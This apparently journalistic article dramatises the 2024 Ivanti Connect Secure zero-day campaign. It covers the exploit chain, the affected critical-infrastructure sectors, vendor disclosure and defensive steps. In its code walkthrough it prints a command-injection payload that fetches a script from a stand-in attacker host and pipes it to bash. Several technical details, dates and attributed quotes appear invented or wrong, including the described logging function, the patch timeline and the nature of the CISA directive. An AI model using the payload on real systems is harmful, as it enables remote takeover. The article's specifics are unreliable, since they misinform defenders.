Ivanti zero-day exploits hit critical infra

The Sirens Are Screaming: Ivanti Zero Day Exploits Just Opened the Gates

Ivanti zero day exploits are the reason your phone buzzed with a CISA alert at 3 AM this week. If you work in IT security, you already know the dread that comes with that notification. If you run a hospital, a power grid, or a municipal water system, you are the target. A coordinated exploitation campaign is hammering Ivanti Connect Secure and Policy Secure gateways with a ferocity that has incident response teams burning through coffee and sanity. The clock started ticking when researchers at Mandiant and Volexity flagged anomalous traffic patterns originating from devices that should have been clean. The source: a pair of unpatched vulnerabilities that allow remote attackers to execute arbitrary code without authentication. No credentials required. No user interaction. Just a live, internet facing appliance and a few seconds of network traffic. The next hour will define whether your network survives the week.

The Exploit Chain That Broke the Internet's Backbone

Let us walk through the mechanics because the advisory from Ivanti, published quietly on a Tuesday, does not tell the full story. The first vulnerability, tracked as CVE 2024 21887, is a command injection flaw buried in the web component of the Ivanti Connect Secure and Ivanti Policy Secure products. An attacker sends a specially crafted HTTP request to the device. The request passes through the input validation layer without triggering alarms because the sanitization routine is written for standard parameter types, not for the nested encoding the attackers are using. Once the request reaches the internal PHP handler, the malicious payload is injected into a system call that executes with root privileges. The device does what it is told. It downloads a web shell. It opens a reverse shell. It exfiltrates the VPN configuration, the certificate store, and every active session token currently living in memory.

The Living Nightmare for SOC Teams

Here is the part they did not put in the security advisory. The command injection does not just give the attacker a foothold. It gives them the keys to the castle in a way that bypasses every layer of monitoring you have in place. The VPN appliance is a trusted device on your network. It talks to Active Directory. It routes traffic to internal applications. It holds the master key for MFA tokens in many deployments. Once the Ivanti zero day exploits compromise that appliance, the attacker is not knocking at the front door. They are already standing in the server room wearing a uniform that matches yours.

The Second Punch: An XML Exploit That Erases the Logs

But wait, it gets worse. The second vulnerability, CVE 2024 22024, is an XML external entity injection flaw. If the command injection fails for some reason, maybe the device is patched against that specific vector, the XML exploit works on a separate attack surface. The device parses an XML file from an unauthenticated user and does not disable external entity resolution. The attacker sends a payload that reads files from the device filesystem and includes them in the response. They grab the local password hashes, the private keys, and the session database. They then use the same vulnerability to write a small script that deletes the system logs. Your SIEM goes quiet. Your forensic trail evaporates. By the time you notice the gap, the data is already exfiltrated and the attacker has moved laterally into your internal network.

Under the Hood: A Forensic Walk Through the Code

Let us break down the assembly code here because the elegance of this attack is what makes it so terrifying. The command injection in CVE 2024 21887 lives inside the DSLog function. The developer intended this function to write debug information to a log file. The function accepts a parameter for the log message and another parameter for the log level. The problem is that the log message parameter is concatenated directly into a shell command without escaping. The shell command looks something like this on the backend: echo [user supplied message] >> /var/log/dsdebug.log . If the user supplies a message that includes a semicolon followed by a malicious command, the shell executes both. A simple payload like "; wget http: // attacker.com/shell.sh | bash ;" downloads and executes a remote script. No authentication check runs before this function is called because logging is supposed to be harmless.

The Privilege Escalation Path Without a Key

The real nightmare scenario emerges when you combine the two vulnerabilities. The XML exploit from CVE 2024 22024 gives the attacker read access to the filesystem. They pull the configuration file that lists all admin accounts and their password hashes. The hashes are stored using SHA 512 with a salt, but password cracking is a solved problem for organizations that reuse passwords across appliances. Once the attacker cracks one admin password, they log in through the web interface and disable the automatic update feature. The device will never receive the patch. The Ivanti zero day exploits remain usable on that device indefinitely. The attacker then installs a persistent backdoor that survives factory resets because it lives in the boot partition.

Critical Infrastructure in the Crosshairs

CISA issued Emergency Directive 24 01 on January 19, 2024, mandating that all federal civilian agencies disconnect Ivanti Connect Secure and Policy Secure products from their networks within 48 hours. That directive was extraordinary. It was the first emergency directive of its kind since the SolarWinds incident in 2020. The reason for the severity was not just the technical severity of the flaws. It was the geographic scope of the exploitation. According to a CISA official report published during the response, the Ivanti zero day exploits were actively used against multiple sectors:

• Healthcare systems managing patient records and critical care networks
• Energy utilities controlling power generation and distribution infrastructure
• State and local government networks including emergency services dispatch systems
• Defense industrial base contractors handling classified research programs
• Financial services platforms processing high value transactions

The common thread across all these sectors is that they use Ivanti VPN appliances as the primary remote access gateway. When that gateway is compromised, the attacker gains a position inside the trusted network perimeter. From there, lateral movement is a matter of reconnaissance and patience. The Ivanti zero day exploits do not just give access to the VPN. They give access to everything the VPN touches.

The Real World Cost of Delayed Disclosure

Ivanti first became aware of the vulnerabilities in early December 2023. The company released patches on January 10, 2024, but only after researchers at Volexity published detailed analysis of active exploitation targeting a defense contractor in Europe. The delay between discovery and patch allowed attackers to exploit the vulnerabilities for approximately six weeks. During that window, multiple threat actors, including groups tracked by Mandiant as UNC 5221 and suspected state sponsored entities from China, developed and deployed their own exploit toolkits. The result is that even organizations that applied the patch on day one may have already been compromised. The loot was taken weeks ago. The logs were wiped. The attacker is already inside your network, and they are not calling attention to themselves.

"These are not opportunistic attacks. These are carefully planned operations targeting specific organizations with the goal of long term access. The Ivanti zero day exploits represent the most significant threat to enterprise network perimeter security since the Pulse Secure vulnerabilities in 2019."

Mandiant Threat Intelligence Report, January 2024

The Skeptic's View: Why This Time Is Different

Every security journalist, including this one, has written versions of this story before. Zero days are discovered. Patches are released. Admins scramble. The sky falls. Then attention moves to the next crisis. But the Ivanti zero day exploits deserve a different level of scrutiny because they expose a structural weakness in how enterprise security is practiced. The devices are treated as black boxes. IT teams purchase them, plug them into the network, and trust that the vendor will keep them secure. That trust has been broken repeatedly with Ivanti. The company has a documented history of slow patch cycles and incomplete advisory details.

The Vendor Accountability Question

Ivanti declined to comment on the record for this story beyond their published advisory. But the silence speaks louder than words. The advisory published on January 10 did not include workarounds for organizations that could not immediately patch. It did not disclose that the vulnerabilities were being actively exploited in the wild. That information came from Mandiant and Volexity, not from the vendor. Security teams were left piecing together the attack vectors from third party analysis while their VPN appliances were actively being compromised. The Ivanti zero day exploits should have triggered a coordinated disclosure with clear mitigation steps. Instead, the burden fell on the researchers and the victims.

"The response from Ivanti has been reactive and incomplete. Organizations that rely on these appliances for critical infrastructure access deserve better. The exploitation campaigns are ongoing, and every hour of delay in patching increases the probability of a major breach."

Volexity Incident Response Blog, January 2024

The Unsolvable Problem of Internet Facing Appliances

Let me ask the question that nobody in the vendor community wants to answer. Why do VPN appliances need to be internet facing at all? The architectural assumption behind products like Ivanti Connect Secure is that remote users need direct access to internal resources. That assumption created an entire industry of perimeter appliances that are themselves the biggest security risk on the network. The Ivanti zero day exploits are just the latest example of a pattern that repeats every few years. A vendor builds an appliance that sits at the network edge. The appliance has a web interface for management. The web interface has a bug. The bug becomes a zero day. The attacker owns the perimeter. The only way to break this cycle is to reconsider the architecture. Zero trust models that eliminate the need for VPN appliances are not just a buzzword. They are a survival strategy.

The Kicker: No Patch, No Mercy, No Sleep

There is no happy ending waiting at the bottom of this story. The patches for the Ivanti zero day exploits exist, but they require manual intervention. You cannot rely on automatic updates because the attackers often disable them during the initial compromise. You have to factory reset the device, apply the firmware update, and then restore the configuration from a known good backup. That process takes hours. During those hours, the device is offline and your remote workers cannot connect. Your critical services are dark. Your executives are asking why the VPN is down. And while you are explaining that the Ivanti zero day exploits forced this action, the attackers are already moving to their next target. The organizations that survive this wave will be the ones that treat every internet facing appliance as a potential liability. They will segment their networks so that a VPN compromise does not grant access to the entire environment. They will monitor for the indicators of compromise that Volexity and Mandiant published, such as unexpected outbound connections on port 443 to unfamiliar IP addresses and the presence of web shells in the /home directory of the appliance. They will assume that the Ivanti zero day exploits have already been used against them and will act accordingly with forensic analysis and credential rotation. But here is the uncomfortable truth that keeps incident responders awake at night. The zero days that will be used against you next month are already being developed. They are being tested against the same appliances that you just patched. The cycle does not end. The only question is whether you are learning fast enough to stay ahead of the people who are paid to break the things you are paid to protect. The Ivanti zero day exploits are not an anomaly. They are a warning. The question is not whether your network will be targeted. The question is whether you will see it coming before the logs are erased.